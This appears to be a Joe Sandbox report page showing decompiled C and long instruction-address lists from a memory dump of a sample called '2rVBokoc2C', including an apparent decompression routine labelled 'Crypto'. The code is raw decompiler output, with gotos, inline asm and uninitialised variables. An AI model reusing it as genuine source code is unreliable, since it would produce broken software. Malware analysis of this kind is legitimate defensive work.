							if( *((char*)(_t638 + 0x4c50)) != 0) {
								L162:
								 *((char*)(_t638 + 0x4c60)) = 0;
								goto L100;
							}
							goto L18;
						}
						L16:
						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
							goto L100;
						}
						goto L17;
					}
				}
			}

0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5bea
0x00bb5bea
0x00bb5bf0
0x00bb5bfb
0x00000000
0x00bb5bfd
0x00bb5bfd
0x00bb5bfd
0x00bb5c03
0x00bb5c03
0x00bb5c0c
0x00bb5c0f
0x00000000
0x00000000
0x00bb5c1e
0x00bb5c25
0x00bb61d0
0x00bb61d2
0x00bb61d7
0x00bb61de
0x00bb61de
0x00bb5c2b
0x00bb5c2b
0x00bb5c2c
0x00bb5c2f
0x00bb5c36
0x00000000
0x00000000
0x00bb5c3c
0x00bb5c44
0x00bb5c45
0x00bb5c46
0x00bb5c47
0x00bb5c4e
0x00000000
0x00bb5c50
0x00000000
0x00bb5c50
0x00bb5c4e
0x00bb5c55
0x00bb5c57
0x00bb5c5c
0x00bb5c5e
0x00000000
0x00bb5c64
0x00bb5c64
0x00bb5c64
0x00bb5c67
0x00bb5c67
0x00bb5c77
0x00bb5c7c
0x00bb5cbc
0x00bb5cbe
0x00bb5cc5
0x00bb5ccb
0x00bb5cd1
0x00bb5cd8
0x00bb5d04
0x00bb5d06
0x00bb5d07
0x00bb5d08
0x00bb5d0a
0x00bb5d23
0x00bb5d26
0x00bb5d2d
0x00bb5d30
0x00bb5d33
0x00bb5d3f
0x00bb5d4b
0x00bb5d4d
0x00bb5d53
0x00bb5d55
0x00bb5d55
0x00bb5d57
0x00000000
0x00bb5d0c
0x00bb5d0f
0x00bb5d12
0x00bb5d12
0x00bb5d12
0x00bb5d14
0x00bb5d21
0x00bb5d21
0x00bb5d21
0x00bb5d16
0x00bb5d16
0x00bb5d17
0x00bb5d1a
0x00bb5d1d
0x00000000
0x00bb5d1f
0x00000000
0x00bb5d1f
0x00bb5d1d
0x00000000
0x00bb5d12
0x00bb5cda
0x00bb5cdc
0x00bb5cdf
0x00bb5ce9
0x00bb5cf1
0x00bb5cf7
0x00bb5cfa
0x00bb5d5f
0x00bb5d5f
0x00bb5d65
0x00bb5da1
0x00bb5da1
0x00bb5da7
0x00bb61a3
0x00bb61a3
0x00bb61a9
0x00bb61e1
0x00bb61e1
0x00bb61e7
0x00bb6384
0x00bb6384
0x00bb6384
0x00bb638d
0x00bb6390
0x00bb6392
0x00bb6396
0x00bb63a5
0x00bb63a7
0x00bb63aa
0x00bb63b1
0x00bb63b7
0x00bb63bd
0x00bb63c4
0x00bb63f0
0x00bb63f2
0x00bb63f3
0x00bb63f4
0x00bb63f6
0x00bb6412
0x00bb6415
0x00bb641c
0x00bb641f
0x00bb6422
0x00bb642e
0x00bb643a
0x00bb643c
0x00bb6442
0x00bb6444
0x00bb6444
0x00bb6446
0x00bb644e
0x00bb644e
0x00bb6451
0x00bb6454
0x00bb6465
0x00bb6468
0x00bb6468
0x00bb6456
0x00bb6456
0x00bb6456
0x00bb646a
0x00bb646d
0x00bb646f
0x00bb6473
0x00bb647a
0x00bb6482
0x00bb6484
0x00bb648b
0x00bb648e
0x00bb648e
0x00bb6491
0x00bb6491
0x00bb6494
0x00bb649b
0x00bb649f
0x00bb64a2
0x00bb64b4
0x00bb64b4
0x00bb64bf
0x00bb64c1
0x00bb64c6
0x00bb64c8
0x00bb656d
0x00bb656d
0x00bb656f
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00000000
0x00bb5be7
0x00bb5be7
0x00bb6575
0x00bb6575
0x00bb657b
0x00bb657b
0x00bb6581
0x00bb6586
0x00bb658a
0x00bb658d
0x00bb6592
0x00bb659b
0x00bb659d
0x00bb659d
0x00bb659d
0x00000000
0x00bb657b
0x00bb64ce
0x00bb64ce
0x00bb64d0
0x00000000
0x00000000
0x00bb64d6
0x00bb64d6
0x00bb64dc
0x00bb64de
0x00bb64e4
0x00bb64e7
0x00bb64e9
0x00bb653a
0x00bb653a
0x00bb653d
0x00000000
0x00000000
0x00bb6543
0x00bb6545
0x00bb6545
0x00bb6548
0x00bb654c
0x00bb654e
0x00bb654e
0x00bb6552
0x00bb6557
0x00bb655a
0x00bb655d
0x00bb6560
0x00bb6563
0x00bb6563
0x00bb6563
0x00000000
0x00bb6568
0x00bb64eb
0x00bb64ed
0x00bb64ee
0x00bb64f0
0x00000000
0x00000000
0x00bb64f6
0x00bb64f8
0x00bb64f8
0x00bb64fb
0x00bb64fb
0x00bb64fd
0x00bb64ff
0x00bb6505
0x00bb650b
0x00bb6511
0x00bb6517
0x00bb651d
0x00bb6523
0x00bb6526
0x00bb6529
0x00bb652b
0x00bb652e
0x00bb6530
0x00bb6530
0x00bb6530
0x00000000
0x00bb64a4
0x00bb64a4
0x00bb64a4
0x00bb64ad
0x00bb64ae
0x00bb6002
0x00bb6002
0x00bb6009
0x00bb600e
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5bea
0x00bb5bea
0x00bb5bea
0x00bb5bf0
0x00bb5bfb
0x00000000
0x00bb5bfd
0x00bb5bfd
0x00bb5bfd
0x00000000
0x00bb5bfb
0x00000000
0x00bb5bea
0x00bb61fb
0x00bb6202
0x00bb6216
0x00bb6216
0x00bb6221
0x00bb6224
0x00bb6229
0x00bb622b
0x00bb622d
0x00bb634a
0x00bb634a
0x00bb634c
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5bea
0x00bb5bf0
0x00bb5bfb
0x00000000
0x00bb5bfd
0x00bb5bfd
0x00bb5bfd
0x00bb5bfb
0x00bb5be7
0x00bb6352
0x00bb6352
0x00bb6358
0x00bb6358
0x00bb635e
0x00bb6363
0x00bb6367
0x00bb636a
0x00bb636f
0x00bb6378
0x00bb637a
0x00bb637a
0x00bb637a
0x00bb65a2
0x00bb65a2
0x00000000
0x00bb65a2
0x00bb6233
0x00bb6233
0x00bb6235
0x00000000
0x00000000
0x00bb623b
0x00bb623b
0x00bb6241
0x00bb6243
0x00bb6249
0x00bb624c
0x00bb624e
0x00bb6298
0x00bb6298
0x00bb629b
0x00bb62c6
0x00bb62c6
0x00bb62c9
0x00bb62cb
0x00000000
0x00000000
0x00bb62d1
0x00bb62d3
0x00bb62d6
0x00bb62d9
0x00bb62dc
0x00000000
0x00000000
0x00bb62e2
0x00bb62e5
0x00bb62e8
0x00bb62eb
0x00bb62ee
0x00000000
0x00000000
0x00bb62f4
0x00bb62f7
0x00bb62fa
0x00bb62fd
0x00bb6300
0x00000000
0x00000000
0x00bb6306
0x00bb6309
0x00bb630c
0x00bb630f
0x00bb6312
0x00000000
0x00000000
0x00bb6318
0x00bb631b
0x00bb631e
0x00bb6321
0x00bb6324
0x00000000
0x00000000
0x00bb632a
0x00bb632d
0x00bb6330
0x00bb6333
0x00bb6336
0x00000000
0x00000000
0x00bb633c
0x00bb633f
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00bb5be7
0x00000000
0x00bb5be7
0x00bb5be7
0x00bb629d
0x00bb629f
0x00bb629f
0x00bb62a2
0x00bb62a6
0x00bb62a8
0x00bb62a8
0x00bb62ac
0x00bb62b1
0x00bb62b4
0x00bb62b7
0x00bb62ba
0x00bb62bd
0x00bb62bd
0x00bb62bd
0x00bb62c2
0x00bb62c2
0x00000000
0x00bb62c2
0x00bb6250
0x00bb6252
0x00bb6253
0x00bb6255
0x00000000
0x00000000
0x00bb6257
0x00bb6259
0x00bb6259
0x00bb625c
0x00bb625c
0x00bb625e
0x00bb6260
0x00bb6266
0x00bb626c
0x00bb6272
0x00bb6278
0x00bb627e
0x00bb6284
0x00bb6287
0x00bb628a
0x00bb628c
0x00bb628f
0x00bb6291
0x00bb6291
0x00bb6291
0x00000000
0x00bb6296
0x00bb6204
0x00bb6204
0x00bb620d
0x00bb620e
0x00000000
0x00bb620e
0x00bb61bc
0x00bb61c3
0x00bb61c8
0x00bb61c8
0x00000000
0x00bb5be7
0x00bb64a2
0x00bb63f8
0x00bb63fe
0x00bb6401
0x00bb6401
0x00bb6401
0x00bb6403
0x00000000
0x00000000
0x00bb6405
0x00bb6405
0x00bb6406
0x00bb6409
0x00bb640c
0x00000000
0x00000000
0x00bb640e
0x00000000
0x00bb640e
0x00bb6410
0x00bb6410
0x00000000
0x00bb6410
0x00bb63c6
0x00bb63c8
0x00bb63cb
0x00bb63d5
0x00bb63dd
0x00bb63e3
0x00bb63e6
0x00000000
0x00000000
0x00000000
0x00000000
0x00bb6398
0x00bb6398
0x00bb639b
0x00bb639d
0x00bb63a0
0x00bb63a0
0x00bb63a0
0x00000000
0x00bb6398
0x00bb61ed
0x00bb61ed
0x00bb61f0
0x00bb61f3
0x00bb61f3
0x00bb61ab
0x00bb61b1
0x00bb61b3
0x00bb61b8
0x00bb61ba
0x00000000
0x00000000
0x00000000
0x00bb61ba
0x00bb5dad
0x00bb5dad
0x00bb5db3
0x00bb5db6
0x00bb5dc7
0x00bb5dca
0x00bb5dca
0x00bb5db8
0x00bb5db8
0x00bb5db8
0x00bb5dcc
0x00bb5dcf
0x00bb5dd1
0x00bb5dd5
0x00bb5ddc
0x00bb5de4
0x00bb5de6
0x00bb5ded
0x00bb5df0
0x00bb5df0
0x00bb5df3
0x00bb5df3
0x00bb5df8
0x00bb5dff
0x00bb5e05
0x00bb5e0b
0x00bb5e12
0x00bb5e3e
0x00bb5e40
0x00bb5e41
0x00bb5e42
0x00bb5e44
0x00bb5e60
0x00bb5e63
0x00bb5e6a
0x00bb5e6d
0x00bb5e70
0x00bb5e7c
0x00bb5e88
0x00bb5e8a
0x00bb5e90
0x00bb5e92
0x00bb5e92
0x00bb5e94
0x00000000
0x00bb5e94
0x00bb5e46
0x00bb5e4c
0x00bb5e4f
0x00bb5e4f
0x00bb5e4f
0x00bb5e51
0x00000000
0x00000000
0x00bb5e53
0x00bb5e53
0x00bb5e54
0x00bb5e57
0x00bb5e5a
0x00000000
0x00000000
0x00bb5e5c
0x00000000
0x00bb5e5c
0x00bb5e5e
0x00bb5e5e
0x00000000
0x00bb5e14
0x00bb5e14
0x00bb5e16
0x00bb5e19
0x00bb5e23
0x00bb5e2b
0x00bb5e31
0x00bb5e34
0x00bb5e9c
0x00bb5e9c
0x00bb5e9f
0x00bb5ea2
0x00bb5eb2
0x00bb5eb5
0x00bb5eb5
0x00bb5ea4
0x00bb5ea4
0x00bb5ea4
0x00bb5eb7
0x00bb5eb8
0x00bb5ebc
0x00bb5ebe
0x00bb5ec2
0x00bb5ec4
0x00bb5fb8
0x00bb5fb8
0x00000000
0x00bb5eca
0x00bb5eca
0x00bb5eca
0x00bb5ecd
0x00bb6013
0x00bb6016
0x00bb601f
0x00bb6027
0x00bb602b
0x00bb602f
0x00bb6036
0x00bb6039
0x00bb603f
0x00bb5fbb
0x00bb5fbb
0x00bb5fc1
0x00bb5fc3
0x00bb5fc4
0x00bb5fca
0x00bb5fcc
0x00bb5fcd
0x00bb5fd3
0x00bb5fd5
0x00bb5fd5
0x00bb5fd5
0x00bb5fd3
0x00bb5fca
0x00bb5fd9
0x00bb5fdf
0x00bb5fe5
0x00bb5fe8
0x00bb5feb
0x00bb5ff2
0x00bb5ff5
0x00bb6047
0x00bb604d
0x00bb6050
0x00bb6052
0x00bb6059
0x00bb605b
0x00bb605d
0x00bb6169
0x00bb6169
0x00bb616b
0x00000000
0x00000000
0x00bb6171
0x00bb6171
0x00bb6177
0x00bb6177
0x00bb617d
0x00bb6182
0x00bb6186
0x00bb6189
0x00bb618e
0x00bb6197
0x00bb6199
0x00bb6199
0x00bb6199
0x00000000
0x00bb619e
0x00bb6063
0x00bb6063
0x00bb6065
0x00000000
0x00000000
0x00bb606b
0x00bb606b
0x00bb6071
0x00bb6074
0x00bb607a
0x00bb607c
0x00bb6080
0x00bb60cb
0x00bb60cb
0x00bb60ce
0x00bb60fd
0x00bb60fd
0x00bb60ff
0x00bb6107
0x00bb610a
0x00bb610d
0x00bb6116
0x00bb6119
0x00bb611c
0x00bb6125
0x00bb6128
0x00bb612b
0x00bb6134
0x00bb6137
0x00bb613a
0x00bb6143
0x00bb6146
0x00bb6149
0x00bb6152
0x00bb6155
0x00bb6158
0x00bb6161
0x00bb6161
0x00bb6158
0x00bb6149
0x00bb613a
0x00bb612b
0x00bb611c
0x00bb610d
0x00000000
0x00bb60ff
0x00bb60d0
0x00bb60d2
0x00bb60d2
0x00bb60d5
0x00bb60d9
0x00bb60db
0x00bb60db
0x00bb60df
0x00bb60e4
0x00bb60e7
0x00bb60ea
0x00bb60ed
0x00bb60f0
0x00bb60f0
0x00bb60f0
0x00bb60f5
0x00bb60f9
0x00000000
0x00bb60f9
0x00bb6082
0x00bb6082
0x00bb6085
0x00000000
0x00000000
0x00bb6087
0x00bb6089
0x00bb6089
0x00bb608c
0x00bb608c
0x00bb608e
0x00bb6091
0x00bb6097
0x00bb609d
0x00bb60a3
0x00bb60a9
0x00bb60af
0x00bb60b5
0x00bb60b8
0x00bb60bb
0x00bb60be
0x00bb60c1
0x00bb60c4
0x00bb60c4
0x00bb60c4
0x00000000
0x00bb5ff7
0x00bb5ff7
0x00bb5ff7
0x00bb6000
0x00bb6001
0x00000000
0x00bb6001
0x00bb5ff5
0x00bb5ed3
0x00bb5ed3
0x00bb5f06
0x00bb5ed5
0x00bb5ed8
0x00bb5ee1
0x00bb5ee9
0x00bb5eec
0x00bb5ef4
0x00bb5efb
0x00bb5f01
0x00bb5f01
0x00bb5f0b
0x00bb5f12
0x00bb5f18
0x00bb5f1e
0x00bb5f25
0x00bb5f51
0x00bb5f53
0x00bb5f54
0x00bb5f55
0x00bb5f57
0x00bb5f73
0x00bb5f76
0x00bb5f7d
0x00bb5f80
0x00bb5f83
0x00bb5f8f
0x00bb5f9b
0x00bb5f9d
0x00bb5fa3
0x00bb5fa5
0x00bb5fa5
0x00bb5fa7
0x00000000
0x00bb5fa7
0x00bb5f59
0x00bb5f5f
0x00bb5f62
0x00bb5f62
0x00bb5f62
0x00bb5f64
0x00000000
0x00000000
0x00bb5f66
0x00bb5f66
0x00bb5f67
0x00bb5f6a
0x00bb5f6d
0x00000000
0x00000000
0x00bb5f6f
0x00000000
0x00bb5f6f
0x00bb5f71
0x00bb5f71
0x00000000
0x00bb5f27
0x00bb5f27
0x00bb5f29
0x00bb5f2c
0x00bb5f36
0x00bb5f3e
0x00bb5f44
0x00bb5f47
0x00bb5faf
0x00bb5fb2
0x00bb5fb2
0x00bb5fb4
0x00000000
0x00bb5fb4
0x00bb5f25
0x00bb5ec4
0x00bb5e12
0x00bb5d67
0x00bb5d67
0x00bb5d6e
0x00bb5d8c
0x00bb5d92
0x00bb5d97
0x00bb5d9a
0x00000000
0x00bb5d9a
0x00bb5d70
0x00bb5d7d
0x00bb5d85
0x00000000
0x00bb5d85
0x00bb5cd8
0x00bb5c7e
0x00bb5c7e
0x00bb5c80
0x00000000
0x00000000
0x00bb5c82
0x00bb5c84
0x00bb5c89
0x00bb5c8f
0x00bb5c95
0x00000000
0x00000000
0x00bb5c9b
0x00bb5c9b
0x00bb5caf
0x00bb5caf
0x00bb5cb6
0x00bb65aa
0x00bb65aa
0x00000000
0x00bb65aa
0x00000000
0x00bb5cb6
0x00bb5c9d
0x00bb5c9d
0x00bb5ca3
0x00bb5ca9
0x00000000
0x00000000
0x00000000
0x00bb5ca9
0x00bb5bea

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39841cac9e84ab4e841f200c595f71da84c95fe04dc46ca835324e53b20566d
Instruction ID: 050dbe09c01cdb74c25deca395f301021109b8fe8bcbd1cd318e11ded43b5cf5
Opcode Fuzzy Hash: a39841cac9e84ab4e841f200c595f71da84c95fe04dc46ca835324e53b20566d
Instruction Fuzzy Hash: 0C62F771604B899FCB25CF38C8906F9BBE1EF95304F0889ADD89B8B346D6B4E945C711

Uniqueness

Uniqueness Score: -1.00%

Function 00BB702F Relevance: .8, Instructions: 773
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00BB702F(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E00BAA740(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E00BAA740(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E00BAA740(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E00BBF300(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
